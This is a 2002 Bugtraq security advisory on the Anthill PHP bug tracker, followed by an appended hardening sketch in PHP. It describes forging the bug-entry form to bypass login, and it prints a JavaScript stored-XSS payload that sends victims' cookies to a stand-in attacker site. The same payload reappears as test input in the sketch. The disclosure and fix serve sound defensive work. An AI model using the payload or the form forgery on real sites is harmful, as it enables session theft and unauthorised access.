Anthill login and JavaScript vulnerabilities

From: Ulf Harnhammar <ulfh@update.uu.se>
To: bugtraq@securityfocus.com
Date: Sat, 6 Apr 2002 19:16:17 +0200 (CEST)
PROGRAM: Anthill
VENDOR: Vincent Danen (vdanen@mandrakesoft.com)
HOMEPAGE: http://anthill.vmlinuz.ca/
VULNERABLE VERSIONS: all
TYPE: remote
SEVERITY: high

DESCRIPTION:

"Anthill is a bug tracking database system written in PHP. It provides the
standard bug tracking features such as: user logins, summary reports,
submitting bugs, querying bugs, various severity and status levels. It also
provides some unique features, such as a template system, and multi-lingual
support."
(direct quote from the program's project page at Freshmeat)

Anthill was written because the vendor felt that Bugzilla was too complex.
It is published under the terms of the GNU General Public License. The program
is used by the MandrakeSoft Secteam, among others.

ISSUES:

1) New bugs are entered by accessing the script enterbug.php. It POSTs the
data to the script postbug.php, which stores it in the database. enterbug.php
checks if you're logged in, but postbug.php does not. This means that people
without accounts can enter new bugs in the system, by creating an HTML
document like the ones that enterbug.php displays (the same field names, the
same action attribute) and then simply accessing that HTML document locally.

2) Almost everywhere in the program, HTML code is stored and displayed without
any interference. This makes it easy for one user to add JavaScript code that
will be executed by another user. One of the authentication methods supported
is based on cookies. If that method is used, a malicious user may enter a
short JavaScript snippet like:

<script>self.location.href="http://www.evilsite.com/evil?"+escape(document.cookie)</script>

to steal other people's cookies with their login information.

COMMUNICATION WITH VENDOR:

The vendor was contacted, first on the 16th of March, and then on the 1st of
April. He realizes that these bugs affect the program's security, but he
doesn't have the time to fix them, since this is just a hobby project that he
doesn't get paid for. (Hmm.. I wonder if Richard Stallman or Linus Torvalds
ever thought that way.)

RECOMMENDATION:

No fixed version is currently available. I recommend that all administrators
use their web servers' authentication/access control facilities in their
Anthill directories to keep strangers away, or that they simply change to
some better program.

// Ulf Harnhammar
ulfh@update.uu.se
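The two issues above share one root cause: the script that writes to the database trusts whatever reaches it, and the script that displays the result trusts whatever is stored. The sketch below is an added example and is not Anthill's code; it shows what a hardened postbug.php would look like, with the login check moved into the script that stores the bug (issue 1) and HTML escaping applied on output so a stored payload is displayed as text rather than executed (issue 2). The helper names (require_login, h, store_bug, load_bug, render_bug), the bugs table layout, the form fields "summary" and "description", the SQLite DSN and showbug.php are all assumptions for the illustration.

```php
<?php
// Added example, not Anthill's own code: a hardened sketch of the
// enterbug.php -> postbug.php flow from the advisory. The helper names
// (require_login, h, store_bug, load_bug, render_bug), the bugs table
// layout, the form fields "summary" and "description", and showbug.php
// are hypothetical; only the two issues they address come from the advisory.

// Issue 1: the login check belongs in the script that writes to the
// database, not only in the script that displays the form. A forged
// form saved in a local HTML file reaches postbug.php directly.
function require_login(): void
{
    // HttpOnly session cookies are not readable from document.cookie,
    // which blunts the cookie theft in issue 2 (set before session_start).
    ini_set('session.cookie_httponly', '1');
    session_start();
    if (empty($_SESSION['user'])) {
        http_response_code(403);
        exit('You must be logged in to file a bug.');
    }
}

// Issue 2: escape on output, so stored markup is shown as text, not run.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

// Store the submission verbatim; escaping happens when it is displayed.
function store_bug(PDO $db, string $reporter, string $summary, string $description): int
{
    $stmt = $db->prepare(
        'INSERT INTO bugs (reporter, summary, description) VALUES (?, ?, ?)'
    );
    $stmt->execute([$reporter, $summary, $description]);
    return (int) $db->lastInsertId();
}

function load_bug(PDO $db, int $id): array
{
    $stmt = $db->prepare('SELECT reporter, summary, description FROM bugs WHERE id = ?');
    $stmt->execute([$id]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: [];
}

function render_bug(array $bug): string
{
    return '<h2>' . h($bug['summary']) . '</h2>'
         . '<p>Reported by ' . h($bug['reporter']) . '</p>'
         . '<pre>' . h($bug['description']) . '</pre>';
}

if (PHP_SAPI === 'cli') {
    // Offline demonstration against an in-memory SQLite database.
    $db = new PDO('sqlite::memory:');
    $db->exec('CREATE TABLE bugs (id INTEGER PRIMARY KEY, reporter TEXT, summary TEXT, description TEXT)');

    // Constructed sample input: the cookie-stealing payload from the advisory.
    $payload = '<script>self.location.href="http://www.evilsite.com/evil?"'
             . '+escape(document.cookie)</script>';
    $id  = store_bug($db, 'mallory', 'Crash on login', $payload);
    $out = render_bug(load_bug($db, $id));

    echo $out, "\n";
    // The <pre> block now contains &lt;script&gt; ... &lt;/script&gt;, which
    // the browser shows as text instead of executing.
    if (strpos($out, '<script>') !== false) {
        fwrite(STDERR, "escaping failed\n");
        exit(1);
    }
} else {
    // Entry point for postbug.php proper.
    require_login();
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('Use the form on enterbug.php.');
    }
    $db = new PDO('sqlite:/var/lib/anthill/bugs.db'); // hypothetical DSN
    // The reporter comes from the session, never from the form, so a
    // forged form cannot file bugs under another account's name.
    $id = store_bug(
        $db,
        $_SESSION['user'],
        (string) ($_POST['summary'] ?? ''),
        (string) ($_POST['description'] ?? '')
    );
    header('Location: showbug.php?id=' . $id);
}
```

Run from the command line (php postbug.php) it stores the advisory's payload and prints the escaped rendering; behind a web server it refuses anonymous POSTs. Two caveats: the session check stops strangers, but a form on another site can still submit on behalf of a user who is logged in (the same local-HTML trick the advisory describes), which needs a per-session form token that the advisory does not cover; and browsers that do not honour HttpOnly still expose the cookie to injected script, so escaping on output remains the primary fix. Until the code is fixed, the advisory's suggestion of web-server access control (for example an Apache Basic-auth requirement on the Anthill directory) keeps unauthenticated users away from postbug.php as well.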
